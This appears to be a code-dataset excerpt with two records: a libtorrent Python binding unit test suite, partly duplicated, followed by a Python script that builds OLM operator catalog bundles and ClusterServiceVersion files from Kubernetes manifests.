self.h.clear_piece_deadlines()
def test_torrent_status(self):
self.setup()
st = self.h.status()
ti = st.handle;
self.assertEqual(ti.info_hash(), self.ti.info_hash())
# make sure we can compare torrent_status objects
st2 = self.h.status()
self.assertEqual(st2, st)
def test_serialize_trackers(self):
"""Test to ensure the dict contains only python built-in types"""
self.setup()
self.h.add_tracker({'url':'udp://tracker1.com'})
tr = self.h.trackers()[0]
# wait a bit until a valid timestamp appears
while tr['next_announce'] == None:
time.sleep(0.1)
tr = self.h.trackers()[0]
import json
print(json.dumps(self.h.trackers()[0]))
def test_scrape(self):
self.setup()
# this is just to make sure this function can be called like this
# from python
self.h.scrape_tracker()
def test_cache_info(self):
self.setup()
cs = self.ses.get_cache_info(self.h)
self.assertEqual(cs.pieces, [])
class test_torrent_info(unittest.TestCase):
def test_bencoded_constructor(self):
info = lt.torrent_info({ 'info': {'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
self.assertEqual(info.num_files(), 1)
f = info.files()
self.assertEqual(f.file_path(0), 'test_torrent')
self.assertEqual(f.file_size(0), 1234)
self.assertEqual(info.total_size(), 1234)
def test_metadata(self):
ti = lt.torrent_info('base.torrent');
self.assertTrue(len(ti.metadata()) != 0)
self.assertTrue(len(ti.hash_for_piece(0)) != 0)
def test_web_seeds(self):
ti = lt.torrent_info('base.torrent');
ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
{'url': 'http://bar/test', 'auth': '', 'type': 1} ]
ti.set_web_seeds(ws)
web_seeds = ti.web_seeds()
self.assertEqual(len(ws), len(web_seeds))
for i in range(len(web_seeds)):
self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
self.assertEqual(web_seeds[i]["type"], ws[i]["type"])
def test_iterable_files(self):
# this detects whether libtorrent was built with deprecated APIs
# the file_strage object is only iterable for backwards compatibility
if not hasattr(lt, 'version'): return
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ti = lt.torrent_info('url_seed_multi.torrent');
files = ti.files()
idx = 0
expected = ['bar.txt', 'var.txt']
for f in files:
print(f.path)
self.assertEqual(os.path.split(f.path)[1], expected[idx])
self.assertEqual(os.path.split(os.path.split(f.path)[0]), ('temp', 'foo'))
idx += 1
def test_announce_entry(self):
ae = lt.announce_entry('test')
self.assertEquals(ae.can_announce(False), True)
self.assertEquals(ae.scrape_incomplete, -1)
self.assertEquals(ae.next_announce, None)
self.assertEquals(ae.last_error.value(), 0)
class test_alerts(unittest.TestCase):
def test_alert(self):
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ti = lt.torrent_info('base.torrent');
h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
st = h.status()
time.sleep(1)
ses.remove_torrent(h)
ses.wait_for_alert(1000) # milliseconds
alerts = ses.pop_alerts()
for a in alerts:
if a.what() == 'add_torrent_alert':
self.assertEquals(a.torrent_name, 'temp')
print(a.message())
for field_name in dir(a):
if field_name.startswith('__'): continue
field = getattr(a, field_name)
if callable(field):
print(' ', field_name, ' = ', field())
else:
print(' ', field_name, ' = ', field)
print(st.next_announce)
self.assertEqual(st.name, 'temp')
print(st.errc.message())
print(st.pieces)
print(st.last_seen_complete)
print(st.completed_time)
print(st.progress)
print(st.num_pieces)
print(st.distributed_copies)
print(st.paused)
print(st.info_hash)
self.assertEqual(st.save_path, os.getcwd())
def test_pop_alerts(self):
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
# this will cause an error (because of duplicate torrents) and the
# torrent_info object created here will be deleted once the alert goes out
# of scope. When that happens, it will decrement the python object, to allow
# it to release the object.
# we're trying to catch the error described in this post, with regards to
# torrent_info.
# https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
time.sleep(1)
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
class test_bencoder(unittest.TestCase):
def test_bencode(self):
encoded = lt.bencode({'a': 1, 'b': [1,2,3], 'c': 'foo'})
self.assertEqual(encoded, b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')
def test_bdecode(self):
encoded = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
decoded = lt.bdecode(encoded)
self.assertEqual(decoded, {b'a': 1, b'b': [1,2,3], b'c': b'foo'})
class test_sha1hash(unittest.TestCase):
def test_sha1hash(self):
h = 'a0'*20
s = lt.sha1_hash(binascii.unhexlify(h))
self.assertEqual(h, str(s))
class test_magnet_link(unittest.TestCase):
def test_parse_magnet_uri(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri(magnet)
p['save_path'] = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
def test_peer_class_ids(self):
s = lt.session({'enable_dht': False})
print('global_peer_class_id:', lt.session.global_peer_class_id)
print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
print('local_peer_class_id:', lt.session.local_peer_class_id)
print('global: ', s.get_peer_class(s.global_peer_class_id))
print('tcp: ', s.get_peer_class(s.local_peer_class_id))
print('local: ', s.get_peer_class(s.local_peer_class_id))
def test_peer_class(self):
s = lt.session({'enable_dht': False})
c = s.create_peer_class('test class')
print('new class: ', s.get_peer_class(c))
nfo = s.get_peer_class(c)
self.assertEqual(nfo['download_limit'], 0)
self.assertEqual(nfo['upload_limit'], 0)
self.assertEqual(nfo['ignore_unchoke_slots'], False)
self.assertEqual(nfo['connection_limit_factor'], 100)
self.assertEqual(nfo['download_priority'], 1)
self.assertEqual(nfo['upload_priority'], 1)
self.assertEqual(nfo['label'], 'test class')
nfo['download_limit'] = 1337
nfo['upload_limit'] = 1338
nfo['ignore_unchoke_slots'] = True
nfo['connection_limit_factor'] = 42
nfo['download_priority'] = 2
nfo['upload_priority'] = 3
s.set_peer_class(c, nfo)
nfo2 = s.get_peer_class(c)
self.assertEqual(nfo, nfo2)
def test_peer_class_filter(self):
filt = lt.peer_class_type_filter()
filt.add(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id);
filt.remove(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id);
filt.disallow(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id);
filt.allow(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id);
def test_peer_class_ip_filter(self):
s = lt.session({'enable_dht': False})
s.set_peer_class_type_filter(lt.peer_class_type_filter())
s.set_peer_class_filter(lt.ip_filter())
class test_session(unittest.TestCase):
def test_post_session_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
s.post_session_stats()
alerts = []
# first the stats headers log line. but not if logging is disabled
if 'log_alert' in [i[0] for i in inspect.getmembers(lt)]:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.log_alert))
# then the actual stats values
if len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.session_stats_alert))
self.assertTrue(isinstance(a.values, dict))
self.assertTrue(len(a.values) > 0)
def test_unknown_settings(self):
try:
s = lt.session({'unexpected-key-name': 42})
self.assertFalse('should have thrown an exception')
except KeyError as e:
print(e)
def test_fingerprint(self):
self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')
def test_deprecated_settings(self):
# this detects whether libtorrent was built with deprecated APIs
if hasattr(lt, 'version'):
s = lt.session({'enable_dht': False})
sett = lt.session_settings()
sett.num_want = 10;
s.set_settings(sett)
s.set_settings({'num_want': 33})
self.assertEqual(s.get_settings()['num_want'], 33)
def test_apply_settings(self):
s = lt.session({'enable_dht': False})
s.apply_settings({'num_want': 66, 'user_agent': '<PASSWORD>'})
self.assertEqual(s.get_settings()['num_want'], 66)
self.assertEqual(s.get_settings()['user_agent'], '<PASSWORD>')
def test_min_memory_preset(self):
min_mem = lt.min_memory_usage()
print(min_mem)
self.assertTrue('connection_speed' in min_mem)
self.assertTrue('file_pool_size' in min_mem)
def test_seed_mode_preset(self):
seed_mode = lt.high_performance_seed()
print(seed_mode)
self.assertTrue('alert_queue_size' in seed_mode)
self.assertTrue('connection_speed' in seed_mode)
self.assertTrue('file_pool_size' in seed_mode)
def test_default_settings(self):
default = lt.default_settings()
print(default)
if __name__ == '__main__':
print(lt.__version__)
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'url_seed_multi.torrent'), '.')
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'base.torrent'), '.')
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'unordered.torrent'), '.')
unittest.main()
|
#!/usr/bin/env python
import libtorrent as lt
import unittest
import time
import os
import shutil
import binascii
import inspect
import pickle
class test_create_torrent(unittest.TestCase):
def test_from_torrent_info(self):
ti = lt.torrent_info('unordered.torrent')
ct = lt.create_torrent(ti, True)
entry = ct.generate()
content = lt.bencode(entry).strip()
with open('unordered.torrent', 'rb') as f:
file_content = bytearray(f.read().strip())
print(content)
print(file_content)
print(entry)
self.assertEqual(content, file_content)
class test_session_stats(unittest.TestCase):
def test_unique(self):
l = lt.session_stats_metrics()
self.assertTrue(len(l) > 40);
idx = set()
for m in l:
self.assertTrue(m.value_index not in idx)
idx.add(m.value_index)
def test_find_idx(self):
self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
def setup(self):
self.ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
self.ti = lt.torrent_info('url_seed_multi.torrent');
self.h = self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd()})
def test_torrent_handle(self):
self.setup()
self.assertEqual(self.h.file_priorities(), [4,4])
self.assertEqual(self.h.piece_priorities(), [4])
self.h.prioritize_files([0,1])
self.assertEqual(self.h.file_priorities(), [0,1])
self.h.prioritize_pieces([0])
self.assertEqual(self.h.piece_priorities(), [0])
# also test the overload that takes a list of piece->priority mappings
self.h.prioritize_pieces([(0, 1)])
self.assertEqual(self.h.piece_priorities(), [1])
def test_torrent_handle_in_set(self):
self.setup()
torrents = set()
torrents.add(self.h)
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a set, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents.add(h)
self.assertEqual(len(torrents), 1)
def test_torrent_handle_in_dict(self):
self.setup()
torrents = {}
torrents[self.h] = 'foo'
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a dict, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents[h] = 'bar'
self.assertEqual(len(torrents), 1)
self.assertEqual(torrents[self.h], 'bar')
def test_replace_trackers(self):
self.setup()
trackers = []
for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
tracker = lt.announce_entry(tracker_url)
tracker.tier = idx
tracker.fail_limit = 2
trackers.append(tracker)
self.h.replace_trackers(trackers)
new_trackers = self.h.trackers()
self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(new_trackers[1]['tier'], 1)
self.assertEqual(new_trackers[1]['fail_limit'], 2)
def test_pickle_trackers(self):
"""Test lt objects convertors are working and trackers can be pickled"""
self.setup()
tracker = lt.announce_entry('udp://tracker1.com')
tracker.tier = 0
tracker.fail_limit = 1
trackers = [tracker]
self.h.replace_trackers(trackers)
tracker_list = [tracker for tracker in self.h.trackers()]
pickled_trackers = pickle.dumps(tracker_list)
unpickled_trackers = pickle.loads(pickled_trackers)
self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(unpickled_trackers[0]['last_error']['value'], 0)
def test_file_status(self):
self.setup()
l = self.h.file_status()
print(l)
def test_piece_deadlines(self):
self.setup()
self.h.clear_piece_deadlines()
def test_torrent_status(self):
self.setup()
st = self.h.status()
ti = st.handle;
self.assertEqual(ti.info_hash(), self.ti.info_hash())
# make sure we can compare torrent_status objects
st2 = self.h.status()
self.assertEqual(st2, st)
def test_serialize_trackers(self):
"""Test to ensure the dict contains only python built-in types"""
self.setup()
self.h.add_tracker({'url':'udp://tracker1.com'})
tr = self.h.trackers()[0]
# wait a bit until a valid timestamp appears
while tr['next_announce'] == None:
time.sleep(0.1)
tr = self.h.trackers()[0]
import json
print(json.dumps(self.h.trackers()[0]))
def test_scrape(self):
self.setup()
# this is just to make sure this function can be called like this
# from python
self.h.scrape_tracker()
def test_cache_info(self):
self.setup()
cs = self.ses.get_cache_info(self.h)
self.assertEqual(cs.pieces, [])
class test_torrent_info(unittest.TestCase):
def test_bencoded_constructor(self):
info = lt.torrent_info({ 'info': {'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
self.assertEqual(info.num_files(), 1)
f = info.files()
self.assertEqual(f.file_path(0), 'test_torrent')
self.assertEqual(f.file_size(0), 1234)
self.assertEqual(info.total_size(), 1234)
def test_metadata(self):
ti = lt.torrent_info('base.torrent');
self.assertTrue(len(ti.metadata()) != 0)
self.assertTrue(len(ti.hash_for_piece(0)) != 0)
def test_web_seeds(self):
ti = lt.torrent_info('base.torrent');
ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
{'url': 'http://bar/test', 'auth': '', 'type': 1} ]
ti.set_web_seeds(ws)
web_seeds = ti.web_seeds()
self.assertEqual(len(ws), len(web_seeds))
for i in range(len(web_seeds)):
self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
self.assertEqual(web_seeds[i]["type"], ws[i]["type"])
def test_iterable_files(self):
# this detects whether libtorrent was built with deprecated APIs
# the file_strage object is only iterable for backwards compatibility
if not hasattr(lt, 'version'): return
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ti = lt.torrent_info('url_seed_multi.torrent');
files = ti.files()
idx = 0
expected = ['bar.txt', 'var.txt']
for f in files:
print(f.path)
self.assertEqual(os.path.split(f.path)[1], expected[idx])
self.assertEqual(os.path.split(os.path.split(f.path)[0]), ('temp', 'foo'))
idx += 1
def test_announce_entry(self):
ae = lt.announce_entry('test')
self.assertEquals(ae.can_announce(False), True)
self.assertEquals(ae.scrape_incomplete, -1)
self.assertEquals(ae.next_announce, None)
self.assertEquals(ae.last_error.value(), 0)
class test_alerts(unittest.TestCase):
def test_alert(self):
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ti = lt.torrent_info('base.torrent');
h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
st = h.status()
time.sleep(1)
ses.remove_torrent(h)
ses.wait_for_alert(1000) # milliseconds
alerts = ses.pop_alerts()
for a in alerts:
if a.what() == 'add_torrent_alert':
self.assertEquals(a.torrent_name, 'temp')
print(a.message())
for field_name in dir(a):
if field_name.startswith('__'): continue
field = getattr(a, field_name)
if callable(field):
print(' ', field_name, ' = ', field())
else:
print(' ', field_name, ' = ', field)
print(st.next_announce)
self.assertEqual(st.name, 'temp')
print(st.errc.message())
print(st.pieces)
print(st.last_seen_complete)
print(st.completed_time)
print(st.progress)
print(st.num_pieces)
print(st.distributed_copies)
print(st.paused)
print(st.info_hash)
self.assertEqual(st.save_path, os.getcwd())
def test_pop_alerts(self):
ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
# this will cause an error (because of duplicate torrents) and the
# torrent_info object created here will be deleted once the alert goes out
# of scope. When that happens, it will decrement the python object, to allow
# it to release the object.
# we're trying to catch the error described in this post, with regards to
# torrent_info.
# https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
time.sleep(1)
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
class test_bencoder(unittest.TestCase):
def test_bencode(self):
encoded = lt.bencode({'a': 1, 'b': [1,2,3], 'c': 'foo'})
self.assertEqual(encoded, b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')
def test_bdecode(self):
encoded = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
decoded = lt.bdecode(encoded)
self.assertEqual(decoded, {b'a': 1, b'b': [1,2,3], b'c': b'foo'})
class test_sha1hash(unittest.TestCase):
def test_sha1hash(self):
h = 'a0'*20
s = lt.sha1_hash(binascii.unhexlify(h))
self.assertEqual(h, str(s))
class test_magnet_link(unittest.TestCase):
def test_parse_magnet_uri(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri(magnet)
p['save_path'] = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
def test_peer_class_ids(self):
s = lt.session({'enable_dht': False})
print('global_peer_class_id:', lt.session.global_peer_class_id)
print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
print('local_peer_class_id:', lt.session.local_peer_class_id)
print('global: ', s.get_peer_class(s.global_peer_class_id))
print('tcp: ', s.get_peer_class(s.local_peer_class_id))
print('local: ', s.get_peer_class(s.local_peer_class_id))
def test_peer_class(self):
s = lt.session({'enable_dht': False})
c = s.create_peer_class('test class')
print('new class: ', s.get_peer_class(c))
nfo = s.get_peer_class(c)
self.assertEqual(nfo['download_limit'], 0)
self.assertEqual(nfo['upload_limit'], 0)
self.assertEqual(nfo['ignore_unchoke_slots'], False)
self.assertEqual(nfo['connection_limit_factor'], 100)
self.assertEqual(nfo['download_priority'], 1)
self.assertEqual(nfo['upload_priority'], 1)
self.assertEqual(nfo['label'], 'test class')
nfo['download_limit'] = 1337
nfo['upload_limit'] = 1338
nfo['ignore_unchoke_slots'] = True
nfo['connection_limit_factor'] = 42
nfo['download_priority'] = 2
nfo['upload_priority'] = 3
s.set_peer_class(c, nfo)
nfo2 = s.get_peer_class(c)
self.assertEqual(nfo, nfo2)
def test_peer_class_filter(self):
filt = lt.peer_class_type_filter()
filt.add(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id);
filt.remove(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id);
filt.disallow(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id);
filt.allow(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id);
def test_peer_class_ip_filter(self):
s = lt.session({'enable_dht': False})
s.set_peer_class_type_filter(lt.peer_class_type_filter())
s.set_peer_class_filter(lt.ip_filter())
class test_session(unittest.TestCase):
def test_post_session_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
s.post_session_stats()
alerts = []
# first the stats headers log line. but not if logging is disabled
if 'log_alert' in [i[0] for i in inspect.getmembers(lt)]:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.log_alert))
# then the actual stats values
if len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.session_stats_alert))
self.assertTrue(isinstance(a.values, dict))
self.assertTrue(len(a.values) > 0)
def test_unknown_settings(self):
try:
s = lt.session({'unexpected-key-name': 42})
self.assertFalse('should have thrown an exception')
except KeyError as e:
print(e)
def test_fingerprint(self):
self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')
def test_deprecated_settings(self):
# this detects whether libtorrent was built with deprecated APIs
if hasattr(lt, 'version'):
s = lt.session({'enable_dht': False})
sett = lt.session_settings()
sett.num_want = 10;
s.set_settings(sett)
s.set_settings({'num_want': 33})
self.assertEqual(s.get_settings()['num_want'], 33)
def test_apply_settings(self):
s = lt.session({'enable_dht': False})
s.apply_settings({'num_want': 66, 'user_agent': '<PASSWORD>'})
self.assertEqual(s.get_settings()['num_want'], 66)
self.assertEqual(s.get_settings()['user_agent'], '<PASSWORD>')
def test_min_memory_preset(self):
min_mem = lt.min_memory_usage()
print(min_mem)
self.assertTrue('connection_speed' in min_mem)
self.assertTrue('file_pool_size' in min_mem)
def test_seed_mode_preset(self):
seed_mode = lt.high_performance_seed()
print(seed_mode)
self.assertTrue('alert_queue_size' in seed_mode)
self.assertTrue('connection_speed' in seed_mode)
self.assertTrue('file_pool_size' in seed_mode)
def test_default_settings(self):
default = lt.default_settings()
print(default)
if __name__ == '__main__':
print(lt.__version__)
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'url_seed_multi.torrent'), '.')
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'base.torrent'), '.')
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'unordered.torrent'), '.')
unittest.main()
|
en
| 0.860912
|
#!/usr/bin/env python # also test the overload that takes a list of piece->priority mappings # get another instance of a torrent_handle that represents the same # torrent. Make sure that when we add it to a set, it just replaces the # existing object # get another instance of a torrent_handle that represents the same # torrent. Make sure that when we add it to a dict, it just replaces the # existing object Test lt objects convertors are working and trackers can be pickled # make sure we can compare torrent_status objects Test to ensure the dict contains only python built-in types # wait a bit until a valid timestamp appears # this is just to make sure this function can be called like this # from python # this detects whether libtorrent was built with deprecated APIs # the file_strage object is only iterable for backwards compatibility # milliseconds # this will cause an error (because of duplicate torrents) and the # torrent_info object created here will be deleted once the alert goes out # of scope. When that happens, it will decrement the python object, to allow # it to release the object. # we're trying to catch the error described in this post, with regards to # torrent_info. # https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html # first the stats headers log line. but not if logging is disabled # then the actual stats values # this detects whether libtorrent was built with deprecated APIs
| 2.364894
| 2
|
scripts/gen_operator_csv.py
|
staebler/osd-operators-registry
| 4
|
6627621
|
<filename>scripts/gen_operator_csv.py
#!/usr/bin/env python
#
# Generate an operator bundle for publishing to OLM. Copies appropriate files
# into a directory, and composes the ClusterServiceVersion which needs bits and
# pieces of our rbac and deployment files.
#
import datetime
import os
import sys
import yaml
import shutil
import subprocess
if __name__ == '__main__':
if len(sys.argv) != 8:
print("USAGE: %s OPERATOR_DIR OPERATOR_NAME OPERATOR_NAMESPACE OPERATOR_VERSION OPERATOR_IMAGE CHANNEL_NAME MULTI_NAMESPACE" % sys.argv[0])
sys.exit(1)
operator_dir = sys.argv[1]
operator_name = sys.argv[2]
operator_namespace = sys.argv[3]
operator_version = sys.argv[4]
operator_image = sys.argv[5]
channel_name = sys.argv[6]
# Coerce to a boolean
multi_namespace = sys.argv[7] == "true".lower()
catalog_dir = os.path.join("catalog-manifests", operator_name)
operator_assets_dir = os.path.join(operator_dir, "manifests")
# Check to see if the manifests directory exists before going on.
if not os.path.exists(operator_assets_dir):
print >> sys.stderr, "ERROR Operator asset directory {} does not exist. Giving up.".format(operator_assets_dir)
sys.exit(1)
if not os.path.exists(catalog_dir):
os.mkdir(catalog_dir)
# fail if there is a bundle for the target version already
version_dir = os.path.join(catalog_dir, operator_version)
if os.path.exists(version_dir):
print >> sys.stderr, "INFO version already exists, skipping: {}".format(version_dir)
sys.exit(0)
# doesn't exist, create the target version
os.mkdir(version_dir)
# update operator package
package_filename = operator_name + ".package.yaml"
package_file = os.path.join(catalog_dir, package_filename)
prev_csv = "__undefined__"
if os.path.isfile(package_file):
with open(package_file) as stream:
yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
prev_csv = obj['channels'][0]['currentCSV']
# create package content
package = {}
package['packageName'] = operator_name
package['channels'] = []
package['channels'].append({'currentCSV': "%s.v%s" % (operator_name, operator_version), 'name': channel_name})
with open(package_file, 'w') as outfile:
yaml.dump(package, outfile, default_flow_style=False)
print("Wrote Package: %s" % package_file)
print("Generating CSV for version: %s" % operator_version)
with open('scripts/templates/csv.yaml', 'r') as stream:
csv = yaml.safe_load(stream)
# set templated values
csv['metadata']['name'] = operator_name
csv['metadata']['namespace'] = operator_namespace
csv['metadata']['containerImage'] = operator_image
csv['spec']['displayName'] = operator_name
csv['spec']['description'] = "SRE operator - " + operator_name
csv['spec']['version'] = operator_version
csv['spec']['install']['spec']['clusterPermissions'] = []
SA_NAME = operator_name
clusterrole_names_csv = []
for subdir, dirs, files in os.walk(operator_assets_dir):
for file in files:
file_path = subdir + os.sep + file
# Parse each file and look for ClusterRoleBindings to the SA
with open(file_path) as stream:
yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
if obj['kind'] == 'ClusterRoleBinding':
for subject in obj['subjects']:
if subject['kind'] == 'ServiceAccount' and subject['name'] == SA_NAME:
clusterrole_names_csv.append(obj['roleRef']['name'])
csv['spec']['install']['spec']['deployments'] = []
csv['spec']['install']['spec']['deployments'].append({'spec':{}})
for subdir, dirs, files in os.walk(operator_assets_dir):
for file in files:
file_path = subdir + os.sep + file
# Parse files to manage clusterPermissions and deployments in csv
with open(file_path) as stream:
yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
if obj['kind'] == 'ClusterRole' and any(obj['metadata']['name'] in cr for cr in clusterrole_names_csv):
print('Adding ClusterRole to CSV: {}'.format(file_path))
csv['spec']['install']['spec']['clusterPermissions'].append(
{
'rules': obj['rules'],
'serviceAccountName': SA_NAME,
})
if obj['kind'] == 'Deployment' and obj['metadata']['name'] == operator_name:
print('Adding Deployment to CSV: {}'.format(file_path))
csv['spec']['install']['spec']['deployments'][0]['spec'] = obj['spec']
csv['spec']['install']['spec']['deployments'][0]['name'] = operator_name
if obj['kind'] == 'ClusterRole' or obj['kind'] == 'Role' or obj['kind'] == 'RoleBinding' or obj['kind'] == 'ClusterRoleBinding':
if obj['kind'] in ('RoleBinding', 'ClusterRoleBinding'):
try:
print(obj['roleRef']['kind'])
except KeyError:
# require a well formed roleRef, olm doesn't check this until deployed and InstallPlan fails
print >> sys.stderr, "ERROR {} '{}' is missing .roleRef.kind in file {}".format(obj['kind'], obj['metadata']['name'], file_path)
sys.exit(1)
print('Adding {} to Catalog: {}'.format(obj['kind'], file_path))
if 'namespace' in obj['metadata']:
bundle_filename="10-{}.{}.{}.yaml".format(obj['metadata']['namespace'], obj['metadata']['name'], obj['kind']).lower()
else:
bundle_filename="00-{}.{}.yaml".format(obj['metadata']['name'], obj['kind']).lower()
shutil.copyfile(file_path, os.path.join(version_dir, bundle_filename))
if len(csv['spec']['install']['spec']['deployments']) == 0:
print >> sys.stderr, "ERROR Did not find any Deployments in {}. There is nothing to deploy, so giving up.".format(operator_assets_dir)
sys.exit(1)
# Update the deployment to use the defined image:
csv['spec']['install']['spec']['deployments'][0]['spec']['template']['spec']['containers'][0]['image'] = operator_image
# Update the versions to include git hash:
csv['metadata']['name'] = "%s.v%s" % (operator_name, operator_version)
csv['spec']['version'] = operator_version
if prev_csv != "__undefined__":
csv['spec']['replaces'] = prev_csv
# adjust the install mode for multiple namespaces, if we need to
i = 0
found_multi_namespace = False
for m in csv['spec']['installModes']:
print("Looking for MultiNamespace, i = {} on = {}".format(i, m['type']))
if m['type'] == "MultiNamespace":
found_multi_namespace = True
break
i = i + 1
if found_multi_namespace:
csv['spec']['installModes'][i]['supported'] = multi_namespace
# Set the CSV createdAt annotation:
now = datetime.datetime.now()
csv['metadata']['annotations']['createdAt'] = now.strftime("%Y-%m-%dT%H:%M:%SZ")
# Write the CSV to disk:
csv_filename = "20-%s.v%s.clusterserviceversion.yaml" % (operator_name, operator_version)
csv_file = os.path.join(version_dir, csv_filename)
with open(csv_file, 'w') as outfile:
yaml.dump(csv, outfile, default_flow_style=False)
print("Wrote ClusterServiceVersion: %s" % csv_file)
|
<filename>scripts/gen_operator_csv.py
#!/usr/bin/env python
#
# Generate an operator bundle for publishing to OLM. Copies appropriate files
# into a directory, and composes the ClusterServiceVersion which needs bits and
# pieces of our rbac and deployment files.
#
import datetime
import os
import sys
import yaml
import shutil
import subprocess
if __name__ == '__main__':
if len(sys.argv) != 8:
print("USAGE: %s OPERATOR_DIR OPERATOR_NAME OPERATOR_NAMESPACE OPERATOR_VERSION OPERATOR_IMAGE CHANNEL_NAME MULTI_NAMESPACE" % sys.argv[0])
sys.exit(1)
operator_dir = sys.argv[1]
operator_name = sys.argv[2]
operator_namespace = sys.argv[3]
operator_version = sys.argv[4]
operator_image = sys.argv[5]
channel_name = sys.argv[6]
# Coerce to a boolean
multi_namespace = sys.argv[7] == "true".lower()
catalog_dir = os.path.join("catalog-manifests", operator_name)
operator_assets_dir = os.path.join(operator_dir, "manifests")
# Check to see if the manifests directory exists before going on.
if not os.path.exists(operator_assets_dir):
print >> sys.stderr, "ERROR Operator asset directory {} does not exist. Giving up.".format(operator_assets_dir)
sys.exit(1)
if not os.path.exists(catalog_dir):
os.mkdir(catalog_dir)
# fail if there is a bundle for the target version already
version_dir = os.path.join(catalog_dir, operator_version)
if os.path.exists(version_dir):
print >> sys.stderr, "INFO version already exists, skipping: {}".format(version_dir)
sys.exit(0)
# doesn't exist, create the target version
os.mkdir(version_dir)
# update operator package
package_filename = operator_name + ".package.yaml"
package_file = os.path.join(catalog_dir, package_filename)
prev_csv = "__undefined__"
if os.path.isfile(package_file):
with open(package_file) as stream:
